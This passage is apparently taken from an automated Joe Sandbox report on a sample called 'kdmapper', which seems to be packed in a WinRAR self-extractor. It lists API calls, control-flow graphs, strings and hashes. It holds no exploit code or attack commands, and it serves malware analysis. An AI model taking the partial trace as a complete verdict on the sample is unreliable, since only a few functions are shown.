                                                                                                                                                                                                                • Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                                                                                                                                                                • Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DFB8D1
                                                                                                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFB8EF
                                                                                                                                                                                                              • IsDialogMessageW.USER32(?,?), ref: 00DFB902
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00DFB910
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00DFB91A
                                                                                                                                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00DFB93D
                                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00DFB960
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000068), ref: 00DFB983
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DFB99E
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00E135F4), ref: 00DFB9B1
                                                                                                                                                                                                                • Part of subcall function 00DFD453: _wcschr.LIBVCRUNTIME ref: 00DFD45C
                                                                                                                                                                                                                • Part of subcall function 00DFD453: _wcslen.LIBCMT ref: 00DFD47D
                                                                                                                                                                                                              • SetFocus.USER32(00000000), ref: 00DFB9B8
                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00DFBA24
                                                                                                                                                                                                                • Part of subcall function 00DE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE40A5
                                                                                                                                                                                                                • Part of subcall function 00DFD4D4: GetDlgItem.USER32(00000068,00E3FCB8), ref: 00DFD4E8
                                                                                                                                                                                                                • Part of subcall function 00DFD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00DFAF07,00000001,?,?,00DFB7B9,00E1506C,00E3FCB8,00E3FCB8,00001000,00000000,00000000), ref: 00DFD510
                                                                                                                                                                                                                • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DFD51B
                                                                                                                                                                                                                • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00E135F4), ref: 00DFD529
                                                                                                                                                                                                                • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DFD53F
                                                                                                                                                                                                                • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00DFD559
                                                                                                                                                                                                                • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DFD59D
                                                                                                                                                                                                                • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00DFD5AB
                                                                                                                                                                                                                • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DFD5BA
                                                                                                                                                                                                                • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DFD5E1
                                                                                                                                                                                                                • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00E143F4), ref: 00DFD5F0
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00DFBA68
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00DFBA90
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00DFBAAE
                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00DFBAC2
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000011), ref: 00DFBAF4
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00DFBB43
                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00DFBB7C
                                                                                                                                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00DFBBD0
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 00DFBBEA
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00DFBC47
                                                                                                                                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00DFBC6F
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00DFBCB9
                                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00DFBCE2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00DFBCEB
                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00DFBD1E
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DFBD7D
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000065,00E135F4), ref: 00DFBD94
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00DFBD9D
                                                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00DFBDAC
                                                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00DFBDBB
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DFBE68
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DFBEBE
                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00DFBEE8
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00DFBF32
                                                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00DFBF4C
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000068), ref: 00DFBF55
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00DFBF6B
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000066), ref: 00DFBF85
                                                                                                                                                                                                              • SetWindowTextW.USER32(00000000,00E2A472), ref: 00DFBFA7
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00DFC007
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DFC01A
                                                                                                                                                                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00DFC0BD
                                                                                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00DFC197
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00DFC1D9
                                                                                                                                                                                                                • Part of subcall function 00DFC73F: __EH_prolog.LIBCMT ref: 00DFC744
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DFC1FD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                                                                                                                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp$Q
                                                                                                                                                                                                              • API String ID: 3829768659-3052343351
                                                                                                                                                                                                              • Opcode ID: bb6e8f2cee889ff339ac28bd5dd1ddeb42ae7b1516ae480149e28995e6e772d2
                                                                                                                                                                                                              • Instruction ID: 7e3b78bb738f0f984e2efdbeadb5648c1b8c05611ff3328d76c0b7daa73be21f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb6e8f2cee889ff339ac28bd5dd1ddeb42ae7b1516ae480149e28995e6e772d2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B42E47094028CBEEB21AB71DD4AFBE7B6CAB11700F098156F744B61D2CB749A49CB31

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 268 df0863-df0886 call dfec50 GetModuleHandleW 271 df0888-df089f GetProcAddress 268->271 272 df08e7-df0b48 268->272 273 df08b9-df08c9 GetProcAddress 271->273 274 df08a1-df08b7 271->274 275 df0b4e-df0b59 call e075fb 272->275 276 df0c14-df0c40 GetModuleFileNameW call dec29a call df0602 272->276 277 df08cb-df08e0 273->277 278 df08e5 273->278 274->273 275->276 284 df0b5f-df0b8d GetModuleFileNameW CreateFileW 275->284 290 df0c42-df0c4e call deb146 276->290 277->278 278->272 287 df0b8f-df0b9b SetFilePointer 284->287 288 df0c08-df0c0f CloseHandle 284->288 287->288 291 df0b9d-df0bb9 ReadFile 287->291 288->276 297 df0c7d-df0ca4 call dec310 GetFileAttributesW 290->297 298 df0c50-df0c5b call df081b 290->298 291->288 294 df0bbb-df0be0 291->294 296 df0bfd-df0c06 call df0371 294->296 296->288 305 df0be2-df0bfc call df081b 296->305 308 df0cae 297->308 309 df0ca6-df0caa 297->309 298->297 307 df0c5d-df0c7b CompareStringW 298->307 305->296 307->297 307->309 312 df0cb0-df0cb5 308->312 309->290 311 df0cac 309->311 311->312 313 df0cec-df0cee 312->313 314 df0cb7 312->314 315 df0dfb-df0e05 313->315 316 df0cf4-df0d0b call dec2e4 call deb146 313->316 317 df0cb9-df0ce0 call dec310 GetFileAttributesW 314->317 327 df0d0d-df0d6e call df081b * 2 call dee617 call de4092 call dee617 call dfa7e4 316->327 328 df0d73-df0da6 call de4092 AllocConsole 316->328 322 df0cea 317->322 323 df0ce2-df0ce6 317->323 322->313 323->317 325 df0ce8 323->325 325->313 334 df0df3-df0df5 ExitProcess 327->334 333 df0da8-df0ded GetCurrentProcessId AttachConsole call e03e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 00DF087C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00DF088E
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00DF08BF
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00DF0B69
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DF0B83
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DF0B93
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,|<,00000000), ref: 00DF0BB1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00DF0C09
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00DF0C1E
                                                                                                                                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<,?,00000000,?,00000800), ref: 00DF0C72
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,|<,00000800,?,00000000,?,00000800), ref: 00DF0C9C
                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,D=,00000800), ref: 00DF0CD8
                                                                                                                                                                                                                • Part of subcall function 00DF081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00DF0836
                                                                                                                                                                                                                • Part of subcall function 00DF081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00DEF2D8,Crypt32.dll,00000000,00DEF35C,?,?,00DEF33E,?,?,?), ref: 00DF0858
                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00DF0D4A
                                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00DF0D96
                                                                                                                                                                                                                • Part of subcall function 00DE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE40A5
                                                                                                                                                                                                              • AllocConsole.KERNEL32 ref: 00DF0D9E
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00DF0DA8
                                                                                                                                                                                                              • AttachConsole.KERNEL32(00000000), ref: 00DF0DAF
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DF0DC4
                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00DF0DD5
                                                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00DF0DDC
                                                                                                                                                                                                              • Sleep.KERNEL32(00002710), ref: 00DF0DE7
                                                                                                                                                                                                              • FreeConsole.KERNEL32 ref: 00DF0DED
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00DF0DF5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                                                                                                              • String ID: (=$,<$,@$0?$0A$4B$8>$D=$DXGIDebug.dll$H?$H@$HA$P>$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=$`@$d?$dA$dwmapi.dll$h=$h>$kernel32$uxtheme.dll$|<$|?$|@$<$>$?$@$A
                                                                                                                                                                                                              • API String ID: 1207345701-31210346
                                                                                                                                                                                                              • Opcode ID: 48793696fa5d5f6041e933c14ff0111e23646736139dc58782cc2fa4953736d3
                                                                                                                                                                                                              • Instruction ID: e50860aa829671e06f3ecae89f407dc4d50d4f260f852f5b1bc5542daa5648ca
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48793696fa5d5f6041e933c14ff0111e23646736139dc58782cc2fa4953736d3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23D166B1104384AFD720DF61984AADFBAE8FBC9704F51991DF285B7251C7708689CB72

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 347 dfc73f-dfc757 call dfeb78 call dfec50 352 dfd40d-dfd418 347->352 353 dfc75d-dfc787 call dfb314 347->353 353->352 356 dfc78d-dfc792 353->356 357 dfc793-dfc7a1 356->357 358 dfc7a2-dfc7b7 call dfaf98 357->358 361 dfc7b9 358->361 362 dfc7bb-dfc7d0 call df1fbb 361->362 365 dfc7dd-dfc7e0 362->365 366 dfc7d2-dfc7d6 362->366 368 dfd3d9-dfd404 call dfb314 365->368 369 dfc7e6 365->369 366->362 367 dfc7d8 366->367 367->368 368->357 384 dfd40a-dfd40c 368->384 370 dfca5f-dfca61 369->370 371 dfc9be-dfc9c0 369->371 372 dfc7ed-dfc7f0 369->372 373 dfca7c-dfca7e 369->373 370->368 379 dfca67-dfca77 SetWindowTextW 370->379 371->368 376 dfc9c6-dfc9d2 371->376 372->368 377 dfc7f6-dfc850 call dfa64d call debdf3 call dea544 call dea67e call de6edb 372->377 373->368 375 dfca84-dfca8b 373->375 375->368 380 dfca91-dfcaaa 375->380 381 dfc9e6-dfc9eb 376->381 382 dfc9d4-dfc9e5 call e07686 376->382 438 dfc98f-dfc9a4 call dea5d1 377->438 379->368 385 dfcaac 380->385 386 dfcab2-dfcac0 call e03e13 380->386 389 dfc9ed-dfc9f3 381->389 390 dfc9f5-dfca00 call dfb48e 381->390 382->381 384->352 385->386 386->368 402 dfcac6-dfcacf 386->402 394 dfca05-dfca07 389->394 390->394 399 dfca09-dfca10 call e03e13 394->399 400 dfca12-dfca32 call e03e13 call e03e3e 394->400 399->400 421 dfca4b-dfca4d 400->421 422 dfca34-dfca3b 400->422 406 dfcaf8-dfcafb 402->406 407 dfcad1-dfcad5 402->407 412 dfcb01-dfcb04 406->412 414 dfcbe0-dfcbee call df0602 406->414 411 dfcad7-dfcadf 407->411 407->412 411->368 417 dfcae5-dfcaf3 call df0602 411->417 419 dfcb06-dfcb0b 412->419 420 dfcb11-dfcb2c 412->420 430 dfcbf0-dfcc04 call e0279b 414->430 417->430 419->414 419->420 433 dfcb2e-dfcb68 420->433 434 dfcb76-dfcb7d 420->434 421->368 429 dfca53-dfca5a call e03e2e 421->429 427 dfca3d-dfca3f 422->427 428 dfca42-dfca4a call e07686 422->428 427->428 428->421 429->368 448 dfcc06-dfcc0a 430->448 449 dfcc11-dfcc62 call df0602 call dfb1be GetDlgItem SetWindowTextW SendMessageW call e03e49 430->449 469 dfcb6c-dfcb6e 433->469 470 dfcb6a 433->470 440 dfcb7f-dfcb97 call e03e13 434->440 441 dfcbab-dfcbce call e03e13 * 2 434->441 455 dfc9aa-dfc9b9 call dea55a 438->455 456 dfc855-dfc869 SetFileAttributesW 438->456 440->441 463 dfcb99-dfcba6 call df05da 440->463 441->430 475 dfcbd0-dfcbde call df05da 441->475 448->449 454 dfcc0c-dfcc0e 448->454 481 dfcc67-dfcc6b 449->481 454->449 455->368 458 dfc90f-dfc91f GetFileAttributesW 456->458 459 dfc86f-dfc8a2 call deb991 call deb690 call e03e13 456->459 458->438 467 dfc921-dfc930 DeleteFileW 458->467 490 dfc8b5-dfc8c3 call debdb4 459->490 491 dfc8a4-dfc8b3 call e03e13 459->491 463->441 467->438 474 dfc932-dfc935 467->474 469->434 470->469 478 dfc939-dfc965 call de4092 GetFileAttributesW 474->478 475->430 488 dfc937-dfc938 478->488 489 dfc967-dfc97d MoveFileW 478->489 481->368 485 dfcc71-dfcc85 SendMessageW 481->485 485->368 488->478 489->438 492 dfc97f-dfc989 MoveFileExW 489->492 490->455 497 dfc8c9-dfc908 call e03e13 call dffff0 490->497 491->490 491->497 492->438 497->458
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00DFC744
                                                                                                                                                                                                                • Part of subcall function 00DFB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00DFB3FB
                                                                                                                                                                                                                • Part of subcall function 00DFAF98: _wcschr.LIBVCRUNTIME ref: 00DFB033
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DFCA0A
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DFCA13
                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00DFCA71
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DFCAB3
                                                                                                                                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 00DFCBFB
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000066), ref: 00DFCC36
                                                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00DFCC46
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,00E2A472), ref: 00DFCC54
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DFCC7F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                                                                                                                                              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                                                                              • API String ID: 986293930-312220925
                                                                                                                                                                                                              • Opcode ID: 57bfbcda861d36cbb8ee61134482c827469c286657d731e39cb067d12e649008
                                                                                                                                                                                                              • Instruction ID: 3758063dc0cc76f949cc1aecf77d7a0bc595031bbfc2a091f9d01e9576d6cef8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57bfbcda861d36cbb8ee61134482c827469c286657d731e39cb067d12e649008
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02E161B290025CAADB24EBA4DD85DFE77BCEB04310F0591A6F749E3041EB749A858F70
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00DEDA70
                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 00DEDA91
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00DEDAAC
                                                                                                                                                                                                                • Part of subcall function 00DEC29A: _wcslen.LIBCMT ref: 00DEC2A2
                                                                                                                                                                                                                • Part of subcall function 00DF05DA: _wcslen.LIBCMT ref: 00DF05E0
                                                                                                                                                                                                                • Part of subcall function 00DF1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00DEBAE9,00000000,?,?,?,00010420), ref: 00DF1BA0
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00DEDDE9
                                                                                                                                                                                                              • __fprintf_l.LIBCMT ref: 00DEDF1C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                                                                                                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9
                                                                                                                                                                                                              • API String ID: 557298264-1836506137
                                                                                                                                                                                                              • Opcode ID: 5fa22cf82c0a7da77fa521372f9d792e1ce5aa26c50b376b1da6dafbf67772c4
                                                                                                                                                                                                              • Instruction ID: d0e5e39dd412971772d19e72939a2f083582eb85417d9473852580f4317b80a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5fa22cf82c0a7da77fa521372f9d792e1ce5aa26c50b376b1da6dafbf67772c4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9532E0719002989BCF24FF69C841AEE77A9FF48700F44411AFA45AB281EBB1DD85CB70

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00DFB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DFB579
                                                                                                                                                                                                                • Part of subcall function 00DFB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFB58A
                                                                                                                                                                                                                • Part of subcall function 00DFB568: IsDialogMessageW.USER32(00010420,?), ref: 00DFB59E
                                                                                                                                                                                                                • Part of subcall function 00DFB568: TranslateMessage.USER32(?), ref: 00DFB5AC
                                                                                                                                                                                                                • Part of subcall function 00DFB568: DispatchMessageW.USER32(?), ref: 00DFB5B6
                                                                                                                                                                                                              • GetDlgItem.USER32(00000068,00E3FCB8), ref: 00DFD4E8
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00DFAF07,00000001,?,?,00DFB7B9,00E1506C,00E3FCB8,00E3FCB8,00001000,00000000,00000000), ref: 00DFD510
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DFD51B
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00E135F4), ref: 00DFD529
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DFD53F
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00DFD559
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DFD59D
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00DFD5AB
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DFD5BA
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DFD5E1
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00E143F4), ref: 00DFD5F0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                                                                              • String ID: \
                                                                                                                                                                                                              • API String ID: 3569833718-2967466578
                                                                                                                                                                                                              • Opcode ID: f5b3aaaff4ccf8ed217dc3309e5daaf7c646df22089385a281a7f7653a6ea00d
